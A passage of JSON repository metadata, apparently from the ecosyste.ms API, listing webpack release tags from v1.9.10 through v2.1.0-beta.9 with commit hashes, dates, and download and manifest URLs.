sitories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw